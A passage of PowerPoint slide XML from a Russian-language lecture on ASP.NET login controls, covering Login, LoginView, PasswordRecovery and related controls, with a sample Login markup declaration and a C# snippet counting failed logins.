        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2743200"/>
            <a:ext cx="2590800" cy="3032125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="125957" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="17351" t="25684" r="46088" b="20459"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4143375" y="2057400"/>
            <a:ext cx="4343400" cy="4800600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125958" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="1600200" y="5715000"/>
            <a:ext cx="2133600" cy="304800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T1" fmla="*/ 0 h 21600"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T3" fmla="*/ 34162212 h 21600"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T5" fmla="*/ 60692798 h 21600"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T7" fmla="*/ 1708100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ru-RU"/>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ru-RU" smtClean="0"/>
              <a:t>Подключение ролей</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="126980" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="19273" t="46196" r="21100" b="25578"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="3003550"/>
            <a:ext cx="7848600" cy="2778125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126981" name="Oval 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="3733800"/>
            <a:ext cx="2209800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128003" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect t="14850" b="2959"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="1420813"/>
            <a:ext cx="8513762" cy="5248275"/>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274638"/>
            <a:ext cx="8229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>ЭУ для подключения к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>приложению</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1484313"/>
            <a:ext cx="8351837" cy="5373687"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" i="1" smtClean="0"/>
              <a:t>Login – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>интерфейс пользователя, который позволяет ввести имя и пароль, а также согласия автоматической аутентификации при следующем подключении к системе. Можно использовать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" i="1" smtClean="0"/>
              <a:t>Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>control с системой управления пользователями ASP.NET, без написания строки кода или можно написать свой код аутентификации добавив обработчик события </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" i="1" smtClean="0"/>
              <a:t>Authenticate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" i="1" smtClean="0"/>
              <a:t>LoginView – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>позволяет показывать разную информацию для подключенных пользователей. Например, можно использовать эту страницу для отображения информации, которая  доступна только аутентифицированным пользователям. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" i="1" smtClean="0"/>
              <a:t>LoginStatus – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>ссылку на login для пользователей, которые не были аутентифицированы и ссылку на logout для подкулюченных пользователей. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" i="1" smtClean="0"/>
              <a:t>LoginName – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>показывает текущее имя пользователя, если он подключен к системе. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" i="1" smtClean="0"/>
              <a:t>PasswordRecovery - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> позволяет восстановить пароль для пользователей, путем отправки e-mail сообщения или при ответе пользователя на секретный вопрос.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" i="1" smtClean="0"/>
              <a:t>CreateUserWizard – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>собирает информацию о новом пользователе и создает новую учетную запись. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" i="1" smtClean="0"/>
              <a:t>ChangePassword – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>позволяет подключенному пользователю сменить пароль. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="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ru-RU" smtClean="0"/>
              <a:t>Элемент управления </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Login</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4997450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Предоставляет готовый к использованию интерфейс, который запрашивает имя и пароль пользователя. Включает кнопку </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Log In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>для подключения пользователя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>При нажатии пользователем кнопки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Log In, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>ЭУ автоматически проверяет имя и пароль пользователя с помощью </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>membership API function Membership.ValidateUser(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>а затем вызывает метод </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>FormsAuthenication.RedirectFromLoginPage()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>, если проверка прошла успешно.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Все опции </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>UI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>влияют на введенные данные</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Например,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>если вы установили опцию </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> “Remember me next time”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>, то передается значение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>true </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>для параметра </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>createPersistentCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> метода </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> RedirectFromLoginPage(). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>И модуль</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> FormsAuthenticationModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> создает долговременный куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Данный ЭУ полностью расширяемый и позволяет переопределить </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>layout </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>стиль и свойства, а также самому обрабатывать события, чтобы изменить стандартное поведение</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Он автоматически использует </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>membership provider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> сконфигурированный для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>приложения.</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ru-RU" smtClean="0"/>
              <a:t>Пример описания ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Login</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131075" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8435975" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>&lt;asp:Login ID="Login1" runat="server"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>   BackColor="aliceblue"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>   BorderColor="Black" BorderStyle="double"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>   CreateUserText="Register"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>   CreateUserUrl="Register.aspx"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>   HelpPageText="Additional Help"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>   HelpPageUrl="HelpMe.htm"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>    InstructionText="Введите ваше имя и пароль &lt;br&gt; для подключения к системе."&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>   &lt;LoginButtonStyle BackColor="DarkBlue" ForeColor="White" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>   &lt;TextBoxStyle CssClass="MyLoginTextBoxStyle" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>   &lt;TitleTextStyle Font-Italic="True" Font-Bold="True" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>		Font-Names="Verdana" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>&lt;/asp:Login&gt;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ru-RU" smtClean="0"/>
              <a:t>События ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Login</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132099" name="Picture 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="2060575"/>
            <a:ext cx="7053262" cy="3757613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>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ru-RU" smtClean="0"/>
              <a:t>Обработка событий ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Login</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1341438"/>
            <a:ext cx="8229600" cy="5256212"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>protected void Page_Load(object sender, EventArgs e)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>if (!this.IsPostBack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>ViewState["LoginErrors"] = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>protected void LoginCtrl_LoginError(object sender, EventArgs e)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>// If the "LoginErrors" state does not exist, create it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>If(ViewState["LoginErrors"] == null)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>ViewState["LoginErrors"] = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
